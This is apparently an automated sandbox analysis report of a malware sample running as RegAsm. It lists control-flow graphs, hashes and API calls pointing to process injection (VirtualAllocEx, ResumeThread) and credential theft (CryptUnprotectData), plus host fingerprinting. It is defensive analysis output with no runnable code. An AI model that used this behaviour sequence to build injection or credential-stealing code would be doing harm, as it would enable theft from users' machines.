                                                                                          • Opcode Fuzzy Hash: d0a6a5b0860db3e6f5bae38f766e8d85ac974868d17b1abeb7dd22909223fae8
                                                                                          • Instruction Fuzzy Hash: 672104B19003098FDB14DFAAC4857AEBBF4EF88314F14842AD959A7340DB78A945CBA5

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 177 2d724c9-2d7254b VirtualAllocEx 181 2d72554-2d72579 177->181 182 2d7254d-2d72553 177->182 182->181
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 02D7253E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2052496085.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d70000_nlJ2sNaZVi.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: 57f045a5e2b09bcfcc37358e5d64468a5dc762c0e1cc5b79c39d9e67330bfcd5
                                                                                          • Instruction ID: 33ff29ecc680bc45dc18dc82fec983b264efea97f3b834dbecf32b36f68cd15e
                                                                                          • Opcode Fuzzy Hash: 57f045a5e2b09bcfcc37358e5d64468a5dc762c0e1cc5b79c39d9e67330bfcd5
                                                                                          • Instruction Fuzzy Hash: 2B1167718002489FCB14DFAAC804AEEBFF5FF88314F208419E919A7250C7399945CBA0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 194 2d724d0-2d7254b VirtualAllocEx 197 2d72554-2d72579 194->197 198 2d7254d-2d72553 194->198 198->197
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 02D7253E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2052496085.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d70000_nlJ2sNaZVi.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: 231d86c66d908e8d29354c41065f57142569f5250a9751aadd7a145225694656
                                                                                          • Instruction ID: d517f41929d0cc37d65aab4a5fd8aed351dabfc2d0b395cf096a48d5060c2f58
                                                                                          • Opcode Fuzzy Hash: 231d86c66d908e8d29354c41065f57142569f5250a9751aadd7a145225694656
                                                                                          • Instruction Fuzzy Hash: 8B1126719002499FCB14DFAAC845AEEBBF5FF88314F208419E519A7250C779A944CBA0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 186 2d72340-2d723b7 ResumeThread 189 2d723c0-2d723e5 186->189 190 2d723b9-2d723bf 186->190 190->189
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2052496085.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d70000_nlJ2sNaZVi.jbxd
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          • Opcode ID: 3d98a461aaaf8c0ab74afbc2ad17718f9881721ed7d06d96b46323db5f8e46b7
                                                                                          • Instruction ID: e811230e1488baf42a720cdb83a26a5c2f05b97297aba013a55fed8b9ccc58d3
                                                                                          • Opcode Fuzzy Hash: 3d98a461aaaf8c0ab74afbc2ad17718f9881721ed7d06d96b46323db5f8e46b7
                                                                                          • Instruction Fuzzy Hash: A01107B19002488EDB14DFAAD4456EEFBF5EB88314F20842AD459A7240C7795945CFA4

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 202 2d72348-2d723b7 ResumeThread 205 2d723c0-2d723e5 202->205 206 2d723b9-2d723bf 202->206 206->205
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2052496085.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d70000_nlJ2sNaZVi.jbxd
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          • Opcode ID: 7143c7b2d7d307ef637e4c5422c278fb04ed07a93d23b6572634867ce0c73b80
                                                                                          • Instruction ID: bdf694a99920b83530dab8da374acac28789b07804f60bd7e92d5f8f7da3b996
                                                                                          • Opcode Fuzzy Hash: 7143c7b2d7d307ef637e4c5422c278fb04ed07a93d23b6572634867ce0c73b80
                                                                                          • Instruction Fuzzy Hash: 1F1128B19002488FCB14DFAAC4457AEFBF9EF88314F20841AD559A7340CB79A944CBA4

                                                                                          Execution Graph

                                                                                          Execution Coverage:12.3%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:69.8%
                                                                                          Total number of Nodes:212
                                                                                          Total number of Limit Nodes:19
                                                                                          execution_graph 13489 435189 RtlAllocateHeap 13490 427d4f 13491 427d57 13490->13491 13492 427e25 GetPhysicallyInstalledSystemMemory 13491->13492 13493 427e49 13492->13493 13493->13493 13494 432550 13495 432578 13494->13495 13499 43265c 13495->13499 13503 437a80 LdrInitializeThunk 13495->13503 13497 432864 13499->13497 13500 432756 13499->13500 13502 437a80 LdrInitializeThunk 13499->13502 13500->13497 13504 437a80 LdrInitializeThunk 13500->13504 13502->13499 13503->13495 13504->13500 13505 410214 13507 410233 13505->13507 13508 40e723 13507->13508 13509 413970 13507->13509 13510 413983 13509->13510 13522 43b760 13510->13522 13512 413b0d 13513 413da8 13512->13513 13514 413b2f 13512->13514 13516 413cf5 13512->13516 13521 413b6c 13512->13521 13526 43baf0 13512->13526 13520 43b760 LdrInitializeThunk 13513->13520 13514->13513 13514->13516 13514->13521 13530 43bbf0 13514->13530 13516->13516 13516->13521 13536 437a80 LdrInitializeThunk 13516->13536 13520->13521 13521->13508 13523 43b770 13522->13523 13524 43b8de 13523->13524 13537 437a80 LdrInitializeThunk 13523->13537 13524->13512 13527 43bb20 13526->13527 13528 43bb9e 13527->13528 13538 437a80 LdrInitializeThunk 13527->13538 13528->13514 13532 43bc20 13530->13532 13531 413b5d 13531->13513 13531->13516 13531->13521 13534 43bc9f 13532->13534 13539 437a80 LdrInitializeThunk 13532->13539 13534->13531 13540 437a80 LdrInitializeThunk 13534->13540 13536->13521 13537->13524 13538->13528 13539->13534 13540->13531 13541 40d8d5 CoInitializeSecurity 13542 40a718 13543 40a800 13542->13543 13543->13543 13546 40b320 13543->13546 13548 40b3b0 13546->13548 13547 40a844 13548->13547 13550 4379e0 13548->13550 13551 437a00 13550->13551 13552 437a66 13550->13552 13553 437a14 13550->13553 13556 437a5b 13550->13556 13551->13552 13551->13553 13557 4351b0 13552->13557 13553->13553 13555 437a46 RtlReAllocateHeap 13553->13555 13555->13556 13556->13548 13558 435260 13557->13558 13559 4351c6 13557->13559 13560 43524c RtlFreeHeap 13557->13560 13558->13556 13559->13560 13560->13558 13561 42731b 13562 42733d 13561->13562 13563 42747a GetComputerNameExA 13562->13563 13565 4274c0 13563->13565 13564 42751b GetComputerNameExA 13566 427580 13564->13566 13565->13564 13565->13565 13567 42815e 13569 4281a0 13567->13569 13568 4282ae 13569->13568 13571 437a80 LdrInitializeThunk 13569->13571 13571->13568 13576 40ae60 13578 40aea0 13576->13578 13577 40b308 13578->13577 13578->13578 13579 4351b0 RtlFreeHeap 13578->13579 13579->13577 13580 42e923 13581 42e928 13580->13581 13582 42e95b GetSystemMetrics GetSystemMetrics 13581->13582 13583 42e99a 13582->13583 13584 429c60 13587 413520 13584->13587 13586 429c65 CoSetProxyBlanket 13587->13586 13588 40d922 13589 40d940 13588->13589 13594 4328d0 13589->13594 13591 40d975 13592 4328d0 11 API calls 13591->13592 13593 40dd45 13592->13593 13596 432920 CoCreateInstance 13594->13596 13597 4329d4 SysAllocString 13596->13597 13598 432f49 13596->13598 13601 432a61 13597->13601 13599 432f61 GetVolumeInformationW 13598->13599 13610 432f7c 13599->13610 13602 432f35 SysFreeString 13601->13602 13603 432a69 CoSetProxyBlanket 13601->13603 13602->13598 13604 432f2b 13603->13604 13605 432a89 SysAllocString 13603->13605 13604->13602 13607 432b70 13605->13607 13607->13607 13608 432bc1 SysAllocString 13607->13608 13611 432be5 13608->13611 13609 432f18 SysFreeString SysFreeString 13609->13604 13610->13591 13610->13610 13611->13609 13612 432f0e 13611->13612 13613 432c2d VariantInit 13611->13613 13612->13609 13615 432c90 13613->13615 13614 432efd VariantClear 13614->13612 13615->13614 13616 437d21 13617 437d30 13616->13617 13617->13617 13618 437d77 GetForegroundWindow 13617->13618 13629 40e4e3 CoInitializeEx CoInitializeEx 13630 438b27 13631 438b50 13630->13631 13632 438bce 13631->13632 13637 437a80 LdrInitializeThunk 13631->13637 13636 437a80 LdrInitializeThunk 13632->13636 13635 438cdf 13636->13635 13637->13632 13638 4385ad 13639 4385d0 13638->13639 13641 43864e 13639->13641 13644 437a80 LdrInitializeThunk 13639->13644 13643 437a80 LdrInitializeThunk 13641->13643 13643->13641 13644->13641 13645 408af0 13647 408afc 13645->13647 13646 408d3c ExitProcess 13647->13646 13648 408b11 GetCurrentThreadId 13647->13648 13651 408d0b 13647->13651 13649 408b42 13648->13649 13650 408b48 GetForegroundWindow 13648->13650 13649->13650 13650->13651 13652 408c0a GetCurrentProcessId 13650->13652 13651->13646 13652->13651 13653 41c630 13654 41c68d 13653->13654 13655 41c63e 13653->13655 13657 41c740 13655->13657 13658 41c750 13657->13658 13658->13658 13661 43b930 13658->13661 13660 41c84f 13662 43b950 13661->13662 13664 43ba9e 13662->13664 13665 437a80 LdrInitializeThunk 13662->13665 13664->13660 13665->13664 13666 435270 13668 4352a0 13666->13668 13667 4352de 13671 435472 13667->13671 13672 4353de 13667->13672 13675 437a80 LdrInitializeThunk 13667->13675 13668->13667 13674 437a80 LdrInitializeThunk 13668->13674 13670 4351b0 RtlFreeHeap 13670->13671 13672->13670 13674->13667 13675->13672 13676 43c0f0 13677 43c120 13676->13677 13679 43c19e 13677->13679 13684 437a80 LdrInitializeThunk 13677->13684 13682 43c444 13679->13682 13683 43c2f3 13679->13683 13685 437a80 LdrInitializeThunk 13679->13685 13680 4351b0 RtlFreeHeap 13680->13682 13683->13680 13684->13679 13685->13683 13686 43827b 13687 438285 13686->13687 13688 43838e 13687->13688 13692 437a80 LdrInitializeThunk 13687->13692 13688->13688 13691 437a80 LdrInitializeThunk 13688->13691 13691->13688 13692->13688 13693 413f3b 13694 413f40 13693->13694 13695 43baf0 LdrInitializeThunk 13694->13695 13696 413f59 13695->13696 13697 43bbf0 LdrInitializeThunk 13696->13697 13698 413f95 13696->13698 13697->13698 13699 41407e 13698->13699 13708 437a80 LdrInitializeThunk 13698->13708 13699->13699 13701 414339 13699->13701 13702 41430f CryptUnprotectData 13699->13702 13706 4144f2 13699->13706 13702->13701 13702->13706 13703 41470b 13703->13703 13704 414a2a 13704->13704 13705 43b930 LdrInitializeThunk 13704->13705 13705->13704 13706->13703 13706->13704 13707 43b930 LdrInitializeThunk 13706->13707 13707->13704 13708->13699 13709 40e2be 13710 40e2d0 13709->13710 13723 41e7b0 13710->13723 13712 40e3e1 13733 41edf0 13712->13733 13714 40e3fd 13715 420a50 LdrInitializeThunk 13714->13715 13716 40e435 13715->13716 13717 421640 RtlFreeHeap LdrInitializeThunk 13716->13717 13718 40e43e 13717->13718 13719 421ad0 CopyFileW RtlFreeHeap LdrInitializeThunk 13718->13719 13720 40e447 13719->13720 13721 42dfd0 6 API calls 13720->13721 13722 40e491 13721->13722 13724 41e810 13723->13724 13724->13724 13725 43b930 LdrInitializeThunk 13724->13725 13730 41e981 13725->13730 13726 41ec4b 13726->13712 13727 41eaf7 13727->13727 13732 41ec62 13727->13732 13737 41cc70 13727->13737 13729 41eae1 GetLogicalDrives 13731 43b930 LdrInitializeThunk 13729->13731 13730->13726 13730->13727 13730->13729 13730->13730 13731->13727 13732->13712 13734 41ee90 13733->13734 13752 41ac70 13734->13752 13738 43b760 LdrInitializeThunk 13737->13738 13740 41ccb0 13738->13740 13739 41d45c 13739->13726 13740->13739 13746 41cda2 13740->13746 13749 437a80 LdrInitializeThunk 13740->13749 13742 41d3b5 13743 4351b0 RtlFreeHeap 13742->13743 13744 41d3c5 13743->13744 13744->13739 13751 437a80 LdrInitializeThunk 13744->13751 13746->13742 13748 4351b0 RtlFreeHeap 13746->13748 13750 437a80 LdrInitializeThunk 13746->13750 13748->13746 13749->13740 13750->13746 13751->13744 13753 41ac80 13752->13753 13754 43b930 LdrInitializeThunk 13753->13754 13755 41acd4 13754->13755 13756 40cfff 13757 40d005 13756->13757 13758 40d00f CoUninitialize 13757->13758 13759 40d040 13758->13759

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 41cc70-41ccb5 call 43b760 3 41d4b7-41d4c7 0->3 4 41ccbb-41cd3f call 413500 call 435120 0->4 9 41cd44-41cd52 4->9 9->9 10 41cd54 9->10 11 41cd56-41cd59 10->11 12 41cd5b-41cd8a 11->12 13 41cd8c-41cd93 11->13 12->11 14 41cd95-41cda0 13->14 15 41cda2 14->15 16 41cda7-41cdc0 14->16 17 41ce5f-41ce62 15->17 18 41cdc2 16->18 19 41cdc7-41cdd2 16->19 22 41ce64 17->22 23 41ce66-41ce6b 17->23 20 41ce4e-41ce53 18->20 19->20 21 41cdd4-41ce44 call 437a80 19->21 25 41ce55 20->25 26 41ce57-41ce5a 20->26 30 41ce49 21->30 22->23 27 41ce71-41ce85 23->27 28 41d3b9-41d3fe call 4351b0 23->28 25->17 26->14 29 41ce87-41cea4 27->29 35 41d403-41d411 28->35 32 41d0b8 29->32 33 41ceaa-41cecb 29->33 30->20 36 41d0bc-41d0c4 32->36 37 41ced2-41ced5 33->37 35->35 38 41d413 35->38 39 41d0c6-41d0ca 36->39 40 41d0cc-41d0e2 call 435120 36->40 41 41ced7-41cf07 37->41 42 41cf26-41cf4b call 41d4d0 37->42 43 41d415-41d418 38->43 44 41d0f6-41d0f8 39->44 56 41d0e4-41d0f4 40->56 57 41d0e6-41d0ed 40->57 45 41cf09 41->45 46 41cf0b-41cf24 41->46 67 41cf52-41cf8d 42->67 68 41cf4d 42->68 49 41d44b-41d452 43->49 50 41d41a-41d449 43->50 53 41d38e-41d393 44->53 54 41d0fe-41d11d 44->54 45->46 46->37 55 41d454-41d45a 49->55 50->43 58 41d395-41d39d 53->58 59 41d39f-41d3a3 53->59 61 41d122-41d12d 54->61 62 41d45c 55->62 63 41d45e-41d472 55->63 56->44 66 41d3ad-41d3af 57->66 65 41d3a5-41d3ab 58->65 59->65 61->61 69 41d12f-41d133 61->69 70 41d4b5 62->70 71 41d474 63->71 72 41d476-41d47c 63->72 65->66 66->29 73 41d3b5-41d3b7 66->73 74 41cf92-41cfa0 67->74 68->32 75 41d135-41d138 69->75 70->3 76 41d4a5-41d4a8 71->76 77 41d480-41d4a0 call 437a80 72->77 78 41d47e 72->78 73->28 74->74 80 41cfa2 74->80 81 41d13a-41d16c 75->81 82 41d16e-41d1a3 75->82 85 41d4aa-41d4ac 76->85 86 41d4ae-41d4b3 76->86 77->76 78->76 87 41cfa4-41cfa7 80->87 81->75 83 41d1a8-41d1b3 82->83 83->83 88 41d1b5 83->88 85->70 86->55 89 41cfe6-41d007 call 41d4d0 87->89 90 41cfa9-41cfe4 87->90 92 41d1b7-41d1ba 88->92 96 41d012-41d029 89->96 97 41d009-41d00d 89->97 90->87 94 41d1e7-41d1eb 92->94 95 41d1bc-41d1e5 92->95 98 41d1ed-41d1f8 94->98 95->92 99 41d02b 96->99 100 41d02d-41d0b6 call 4082d0 call 413160 call 4082e0 96->100 97->36 101 41d1fa 98->101 102 41d1ff-41d21c 98->102 99->100 100->36 104 41d2d4-41d2d7 101->104 105 41d227-41d236 102->105 106 41d21e-41d222 102->106 107 41d2e0-41d2ff 104->107 108 41d2d9 104->108 110 41d2c3-41d2c8 105->110 111 41d23c-41d2b2 call 437a80 105->111 106->110 112 41d304-41d30f 107->112 108->107 115 41d2ca 110->115 116 41d2cc-41d2cf 110->116 119 41d2b7-41d2be 111->119 112->112 117 41d311 112->117 115->104 116->98 120 41d313-41d316 117->120 119->110 121 41d318-41d32d 120->121 122 41d32f-41d335 120->122 121->120 124 41d363-41d366 122->124 125 41d337-41d33b 122->125 127 41d368-41d379 call 4351b0 124->127 128 41d37b-41d381 124->128 129 41d33d-41d344 125->129 132 41d383-41d386 127->132 128->132 133 41d354-41d357 129->133 134 41d346-41d352 129->134 132->53 138 41d388-41d38c 132->138 139 41d359 133->139 140 41d35f-41d361 133->140 134->129 138->66 139->140 140->124
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: $!$!@$"$#$#$%$a$b$c$e$e$e$h$h$h$j$j$j$k$k$k
                                                                                          • API String ID: 2994545307-1787479632
                                                                                          • Opcode ID: 0d4b0a44f7c8528a5e12eac3f544b5e16b3e6cbd2342e5e50717689e85988588
                                                                                          • Instruction ID: 4989aabf6bb3cfaf0020d327f722c038374d9a717f924aaf3cba47e85df5dec7
                                                                                          • Opcode Fuzzy Hash: 0d4b0a44f7c8528a5e12eac3f544b5e16b3e6cbd2342e5e50717689e85988588
                                                                                          • Instruction Fuzzy Hash: 4632A1B190C7808FD3248F28C4843AFBBE1AB96314F18496EE5D9873D2D7798885C75B

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 149 4328d0-43291f 150 432920-43295e 149->150 150->150 151 432960-432979 150->151 153 432983-4329ce CoCreateInstance 151->153 154 43297b 151->154 155 4329d4-432a0b 153->155 156 432f49-432f76 call 43ad30 GetVolumeInformationW 153->156 154->153 158 432a10-432a2f 155->158 161 4330be-4330c5 156->161 162 432f7c-432fa3 call 419b60 156->162 158->158 160 432a31-432a63 SysAllocString 158->160 165 432f35-432f45 SysFreeString 160->165 166 432a69-432a83 CoSetProxyBlanket 160->166 170 432fb0-432fb8 162->170 165->156 168 432f2b-432f31 166->168 169 432a89-432aa4 166->169 168->165 171 432ab0-432adc 169->171 170->170 172 432fba-432fbc 170->172 171->171 173 432ade-432b63 SysAllocString 171->173 174 432fce-432ffd call 419b60 172->174 175 432fbe-432fcb call 408470 172->175 177 432b70-432bbf 173->177 182 433000-433008 174->182 175->174 177->177 180 432bc1-432beb SysAllocString 177->180 187 432bf1-432c13 180->187 188 432f18-432f27 SysFreeString * 2 180->188 182->182 183 43300a-43300c 182->183 185 43301e-43304d call 419b60 183->185 186 43300e-43301b call 408470 183->186 194 433050-433058 185->194 186->185 195 432c19-432c1c 187->195 196 432f0e-432f14 187->196 188->168 194->194 197 43305a-43305c 194->197 195->196 198 432c22-432c27 195->198 196->188 199 43306e-43309b call 419b60 197->199 200 43305e-43306b call 408470 197->200 198->196 201 432c2d-432c88 VariantInit 198->201 208 4330a0-4330a8 199->208 200->199 204 432c90-432cdf 201->204 204->204 207 432ce1-432cf9 204->207 209 432cfd-432d07 207->209 208->208 210 4330aa-4330ac 208->210 211 432efd-432f0a VariantClear 209->211 212 432d0d-432d16 209->212 210->161 213 4330ae-4330bb call 408470 210->213 211->196 212->211 214 432d1c-432d29 212->214 213->161 216 432d2b-432d30 214->216 217 432d6d 214->217 219 432d4c-432d50 216->219 220 432d6f-432d88 call 4082d0 217->220 221 432d52-432d5b 219->221 222 432d40 219->222 228 432ea4-432eb5 220->228 229 432d8e-432d97 220->229 225 432d62-432d66 221->225 226 432d5d-432d60 221->226 224 432d41-432d4a 222->224 224->219 224->220 225->224 230 432d68-432d6b 225->230 226->224 232 432eb7 228->232 233 432ebc-432ecf 228->233 229->228 231 432d9d-432da4 229->231 230->224 234 432db0-432dba 231->234 232->233 235 432ed1 233->235 236 432ed6-432ef9 call 408300 call 4082e0 233->236 237 432dd0-432dd6 234->237 238 432dbc-432dc1 234->238 235->236 236->211 241 432df4-432e00 237->241 242 432dd8-432ddb 237->242 240 432e50-432e56 238->240 248 432e58-432e5e 240->248 245 432e02-432e05 241->245 246 432e6a-432e72 241->246 242->241 244 432ddd-432df2 242->244 244->240 245->246 249 432e07-432e49 245->249 252 432e74-432e76 246->252 253 432e78-432e7b 246->253 248->228 251 432e60-432e62 248->251 249->240 251->234 256 432e68 251->256 252->248 254 432ea0-432ea2 253->254 255 432e7d-432e9e 253->255 254->240 255->240 256->228
                                                                                          APIs
                                                                                          • CoCreateInstance.OLE32(0043E680,00000000,00000001,0043E670,00000000), ref: 004329C6
                                                                                          • SysAllocString.OLEAUT32(F3A5F1A2), ref: 00432A36
                                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00432A7B
                                                                                          • SysAllocString.OLEAUT32(FF0FF903), ref: 00432AE3
                                                                                          • SysAllocString.OLEAUT32(93CF91C3), ref: 00432BC6
                                                                                          • VariantInit.OLEAUT32(?), ref: 00432C39
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                                          • String ID: C$\
                                                                                          • API String ID: 65563702-514332402
                                                                                          • Opcode ID: deaaf2316ac3411dfe0e71c8231e18fc05c64fc47439bbff19a78a68c0f3b602
                                                                                          • Instruction ID: 450e7a8da008b364592ca4d9c89790f2a980374ab3b6d0c135865a1c86b66da4
                                                                                          • Opcode Fuzzy Hash: deaaf2316ac3411dfe0e71c8231e18fc05c64fc47439bbff19a78a68c0f3b602
                                                                                          • Instruction Fuzzy Hash: 0B224372A083019BD320CF24CD4675BBBE5EF89714F14892EF5949B381D7B8E905CB96
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: !',$$-)#$43AM$84$HLA$IFM6$NF0>$R[_F$ejkh${z}
                                                                                          • API String ID: 0-826401997
                                                                                          • Opcode ID: 9491196dd7273cf8ea6c1ac59ddf78724cb3725fc0d21b5717140c40a66c5d46
                                                                                          • Instruction ID: ef02518879307af14c1e0ed1803bea8d752a275a36f9ab6d5d23519f41137339
                                                                                          • Opcode Fuzzy Hash: 9491196dd7273cf8ea6c1ac59ddf78724cb3725fc0d21b5717140c40a66c5d46
                                                                                          • Instruction Fuzzy Hash: 8F6225B69083808BD724CF24D8517EBB7E1EFD5314F18896EE8D987391E7399841CB4A

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 473 41e7b0-41e807 474 41e810-41e83c 473->474 474->474 475 41e83e-41e881 474->475 477 41e883-41e888 475->477 478 41e88a 475->478 479 41e88d-41e8af call 4082d0 477->479 478->479 483 41e8b1 479->483 484 41e8b8-41e8f5 call 4082d0 479->484 483->484 487 41e900-41e91c 484->487 487->487 488 41e91e-41e927 487->488 489 41e941-41e94d 488->489 490 41e929-41e92f 488->490 492 41e971-41e989 call 43b930 489->492 493 41e94f-41e953 489->493 491 41e930-41e93f 490->491 491->489 491->491 497 41e990-41e9a3 492->497 498 41ec60 492->498 499 41eb24-41ebde 492->499 500 41e9aa-41e9b3 492->500 494 41e960-41e96f 493->494 494->492 494->494 497->498 497->499 497->500 503 41ebe0-41ec34 499->503 501 41e9b5-41e9ba 500->501 502 41e9bc 500->502 504 41e9c3-41ea67 call 4082d0 501->504 502->504 503->503 505 41ec36-41ec46 call 41cc70 503->505 510 41ea70-41ea82 504->510 509 41ec4b-41ec5b 505->509 509->498 510->510 511 41ea84-41ea8d 510->511 512 41eab1-41eabd 511->512 513 41ea8f-41ea96 511->513 515 41eae1-41eb01 GetLogicalDrives call 43b930 512->515 516 41eabf-41eac3 512->516 514 41eaa0-41eaaf 513->514 514->512 514->514 520 41ed91 515->520 521 41eda0-41eda6 call 4082e0 515->521 522 41edd3-41ede1 515->522 523 41ec62-41ec8b 515->523 524 41edb5-41edbb call 4082e0 515->524 525 41edc4 515->525 526 41ed97-41ed9d call 4082e0 515->526 527 41eb08-41eb12 515->527 528 41eb1a 515->528 529 41edca-41edd0 call 4082e0 515->529 530 41edaf 515->530 517 41ead0-41eadf 516->517 517->515 517->517 520->526 521->530 534 41ec90-41ecba 523->534 524->525 525->529 526->521 527->528 528->499 529->522 530->524 534->534 540 41ecbc-41ed4b 534->540 541 41ed50-41ed62 540->541 541->541 542 41ed64-41ed87 call 41c8a0 541->542 542->520
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: DrivesLogical
                                                                                          • String ID: )M4C$4I*O$7AFG$A!_'$[=S3$d9M?$w5$z$ke${u
                                                                                          • API String ID: 999431828-4249704212
                                                                                          • Opcode ID: 318887a0b1beac27d9339757ab4c339f15d736c9ad875d69208a7d4b3533ee14
                                                                                          • Instruction ID: 97945e5a585e135679ab7a5379a9d0594cb6c60c0c9a4d7849fc7c71e4e9bb01
                                                                                          • Opcode Fuzzy Hash: 318887a0b1beac27d9339757ab4c339f15d736c9ad875d69208a7d4b3533ee14
                                                                                          • Instruction Fuzzy Hash: 40E1A9B45083409BD310DF25E89166BBBF0FF86754F14892DF8D58B3A1E7B88945CB8A

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 545 432550-432573 546 432578-432583 545->546 546->546 547 432585-432589 546->547 549 43258b-43258e 547->549 550 432590-4325dd 549->550 551 4325df-432601 549->551 550->549 553 432606-432611 551->553 553->553 554 432613 553->554 555 432615-432618 554->555 556 43261a-432647 555->556 557 432649-43264d 555->557 556->555 558 43264f-43265a 557->558 559 43265e-432677 558->559 560 43265c 558->560 562 43267b-432686 559->562 563 432679 559->563 561 4326c9-4326cc 560->561 566 4326d0-4326d5 561->566 567 4326ce 561->567 564 4326bb-4326c0 562->564 565 432688-4326b6 call 437a80 562->565 563->564 569 4326c2 564->569 570 4326c4-4326c7 564->570 565->564 571 4326db-4326fb 566->571 572 4328b8-4328c5 566->572 567->566 569->561 570->558 574 432700-43270b 571->574 574->574 575 43270d 574->575 576 43270f-432712 575->576 577 432743-432747 576->577 578 432714-432741 576->578 579 432749-432754 577->579 578->576 580 432756 579->580 581 432758-432771 579->581 582 4327d5-4327d8 580->582 583 432773 581->583 584 432775-432780 581->584 587 4327da 582->587 588 4327dc-4327e1 582->588 585 4327c4-4327c9 583->585 584->585 586 432782-4327ba call 437a80 584->586 592 4327cb 585->592 593 4327cd-4327d0 585->593 595 4327bf 586->595 587->588 589 4327e3-4327eb 588->589 590 4327ee-43280e 588->590 589->590 594 432813-43281e 590->594 592->582 593->579 594->594 596 432820 594->596 595->585 597 432822-432825 596->597 598 432827-432854 597->598 599 432856-43285a 597->599 598->597 600 43285c-432862 599->600 601 432866-432878 600->601 602 432864 600->602 604 43287a 601->604 605 43287c-432882 601->605 603 4328b6 602->603 603->572 606 4328aa-4328ad 604->606 605->606 607 432884-4328a6 call 437a80 605->607 608 4328b1-4328b4 606->608 609 4328af 606->609 607->606 608->600 609->603
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %$%$%$($($($*$*$*$+$+$+
                                                                                          • API String ID: 0-447118901
                                                                                          • Opcode ID: 15212c366cf0230e31e94e212d7e6711a7da25652ceff0a6a0acdb8934d1dfea
                                                                                          • Instruction ID: 0d8063b59b7ee132a404753d830e1559a2df0a0afe1b4ddca97cad5f3c6ab623
                                                                                          • Opcode Fuzzy Hash: 15212c366cf0230e31e94e212d7e6711a7da25652ceff0a6a0acdb8934d1dfea
                                                                                          • Instruction Fuzzy Hash: 3DA1F13150C3808BD7049B28C65536FBFD1AB9A318F29696FD4C687392D6BEC885C74B

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
